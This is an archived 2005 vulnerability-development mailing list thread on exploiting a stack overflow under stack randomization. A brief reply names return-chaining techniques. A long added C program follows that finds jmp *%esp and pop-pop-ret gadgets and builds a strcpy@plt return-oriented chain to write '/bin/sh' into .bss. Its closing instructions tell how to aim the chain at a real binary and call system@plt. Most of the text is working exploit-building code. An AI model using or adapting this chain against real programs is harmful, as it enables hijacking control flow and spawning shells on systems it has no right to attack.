Vulnerability Development mailing list archives
Re: Randomized Stack
From: Oldani Massimiliano <sgrakkyu () antifork org>
Date: Fri, 25 Nov 2005 17:47:42 +0100
On Nov 23, 2005, at 10:21 PM, veider () ank-pki ru wrote:
> Hello, All!
>
> I am trying to exploit a stack based overflow on a system with stack
> randomization. Knowing function addresses with "objdump -D" I am able
> to run those functions. I've read the Phrack article about bypassing
> PaX ASLR, but there the author is able to control function arguments,
> which is impossible in my case. Any ideas on what I may try?
>
> Bye, All.

Stack random? Only random stack? Or with random mmap()/stack and no-exec workaround? If you have only random stack and you can execute code in the stack, you can check for interesting pointers in the stack and chain a ret-into-ret until you get it, or find somewhere a jmp *%esp instruction and jump to your payload. Alternatively you can construct arguments with a ret-into-PLT strcpy() chain in some RW place and then use them.
----------- Oldani (sgrakkyu) Massimiliano Antifork Research, Inc. Metro Olografix
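The two non-randomised tricks in the reply above (scanning the fixed image for a jmp *%esp, and building strcpy() arguments byte by byte in a RW place through the PLT) as a worked example. This is added code, not from the thread or from either poster: the byte image, the load address 0x08048000, the strcpy@plt address, the .bss scratch address and the "/bin/sh" target are all constructed assumptions standing in for a non-PIE i386 binary where only the stack moves. The program scans the image for a jmp *%esp and a pop-pop-ret gadget, emits one 16-byte frame [strcpy@plt][pop-pop-ret][dst+i][src] per byte of the argument, checks the chain for NUL bytes (a strcpy()-style overflow could not deliver them), and replays the frames with a real strcpy() against a stand-in .bss to show the argument landing at a fixed address.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed values for a non-PIE i386 binary: with only the stack randomised,
 * .text, .rodata, .plt and .bss stay where objdump -D shows them. */
#define IMG_BASE   0x08048000u   /* assumed load address of image[] */
#define STRCPY_PLT 0x08048330u   /* assumed address of strcpy@plt */
#define BSS_BASE   0x0804a020u   /* assumed writable scratch area in .bss */
#define BSS_SIZE   64

/* Constructed stand-in for the binary's bytes: two gadgets, then the bytes of
 * "/bin/sh" each followed by a NUL so strcpy() copies exactly one byte. */
static const uint8_t image[] = {
    0x55, 0x89, 0xe5,            /* push %ebp; mov %esp,%ebp            */
    0xff, 0xe4,                  /* jmp *%esp                (offset 3) */
    0x5b, 0x5d, 0xc3,            /* pop %ebx; pop %ebp; ret  (offset 5) */
    '/', 0, 'b', 0, 'i', 0, 'n', 0, 's', 0, 'h', 0,
};

/* Offset of the first "jmp *%esp" (ff e4), or -1. */
long find_jmp_esp(const uint8_t *img, size_t len) {
    for (size_t i = 0; i + 1 < len; i++)
        if (img[i] == 0xff && img[i + 1] == 0xe4) return (long)i;
    return -1;
}

/* Offset of a "pop r32; pop r32; ret" gadget (58..5f 58..5f c3), or -1. */
long find_pop_pop_ret(const uint8_t *img, size_t len) {
    for (size_t i = 0; i + 2 < len; i++)
        if (img[i] >= 0x58 && img[i] <= 0x5f && img[i + 1] >= 0x58 &&
            img[i + 1] <= 0x5f && img[i + 2] == 0xc3) return (long)i;
    return -1;
}

/* Offset of byte b immediately followed by NUL (a one-byte strcpy source), or -1. */
long find_byte_nul(const uint8_t *img, size_t len, uint8_t b) {
    for (size_t i = 0; i + 1 < len; i++)
        if (img[i] == b && img[i + 1] == 0) return (long)i;
    return -1;
}

/* One frame per byte of arg: [strcpy@plt][pop-pop-ret][dst+i][src]. Each copy also
 * lands a NUL at dst+i+1 (overwritten by the next frame), so the result is terminated. */
long build_strcpy_chain(const char *arg, uint32_t dst, uint32_t *chain, size_t max_words) {
    long ppr = find_pop_pop_ret(image, sizeof image);
    size_t n = 0;
    if (ppr < 0) return -1;
    for (size_t i = 0; i < strlen(arg); i++) {
        long src = find_byte_nul(image, sizeof image, (uint8_t)arg[i]);
        if (src < 0 || n + 4 > max_words) return -1;
        chain[n++] = STRCPY_PLT;
        chain[n++] = IMG_BASE + (uint32_t)ppr;
        chain[n++] = dst + (uint32_t)i;
        chain[n++] = IMG_BASE + (uint32_t)src;
    }
    return (long)n;
}

/* A strcpy()-style overflow stops at the first NUL, so the chain may contain
 * none; returns 1 if any word has a zero byte. */
int chain_has_nul(const uint32_t *chain, size_t nwords) {
    for (size_t i = 0; i < nwords; i++)
        for (int s = 0; s < 32; s += 8)
            if (((chain[i] >> s) & 0xff) == 0) return 1;
    return 0;
}

/* Replay the chain as the CPU would after the overwritten return address: each
 * frame calls strcpy(dst, src), pop-pop-ret discards both arguments, ret hits the next. */
int simulate_chain(const uint32_t *chain, size_t nwords, uint8_t *bss) {
    uint32_t ppr = IMG_BASE + (uint32_t)find_pop_pop_ret(image, sizeof image);
    if (nwords % 4) return -1;
    for (size_t i = 0; i < nwords; i += 4) {
        uint32_t dst = chain[i + 2], src = chain[i + 3];
        if (chain[i] != STRCPY_PLT || chain[i + 1] != ppr) return -1;
        if (dst < BSS_BASE || dst >= BSS_BASE + BSS_SIZE) return -1;
        if (src < IMG_BASE || src >= IMG_BASE + sizeof image) return -1;
        const uint8_t *s = image + (src - IMG_BASE);
        const uint8_t *end = memchr(s, 0, sizeof image - (src - IMG_BASE));
        if (!end || (size_t)(end - s) + 1 > BSS_SIZE - (dst - BSS_BASE)) return -1;
        strcpy((char *)bss + (dst - BSS_BASE), (const char *)s);   /* the real call */
    }
    return 0;
}

static char demo_out[BSS_SIZE];   /* simulated .bss contents after the chain ran */
/* Build "/bin/sh" at BSS_BASE and replay it; returns chain length in words, or -1. */
long demo(void) {
    uint32_t chain[64];
    uint8_t bss[BSS_SIZE] = {0};
    long n = build_strcpy_chain("/bin/sh", BSS_BASE, chain, 64);
    if (n < 0 || chain_has_nul(chain, (size_t)n) || simulate_chain(chain, (size_t)n, bss)) return -1;
    memcpy(demo_out, bss, BSS_SIZE);
    return n;
}

int main(void) {
    long j = find_jmp_esp(image, sizeof image), n = demo();
    printf("jmp *%%esp at 0x%08lx; %ld chain words; simulated .bss holds \"%s\"\n",
           (unsigned long)IMG_BASE + (unsigned long)j, n, demo_out);
    return n < 0;
}
```

Against a real target the image[] bytes come from the binary itself (objdump -s or a raw read of the ELF), the chain is placed in the overflowed buffer starting at the saved return address, and the final frame returns into the function you want to call (for example system@plt) with BSS_BASE as its argument. Seven bytes cost 112 bytes of chain here, which is why the buffer size matters; and if the overflow is a strcpy(), any address containing a 0x00 byte, including a .bss address in a binary loaded low enough, rules that address out.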
Current thread:
- Randomized Stack veider (Nov 24)
- Re: Randomized Stack Oldani Massimiliano (Nov 25)
- Re: Randomized Stack Rik Bobbaers (Nov 28)
- Re: Randomized Stack Oldani Massimiliano (Nov 25)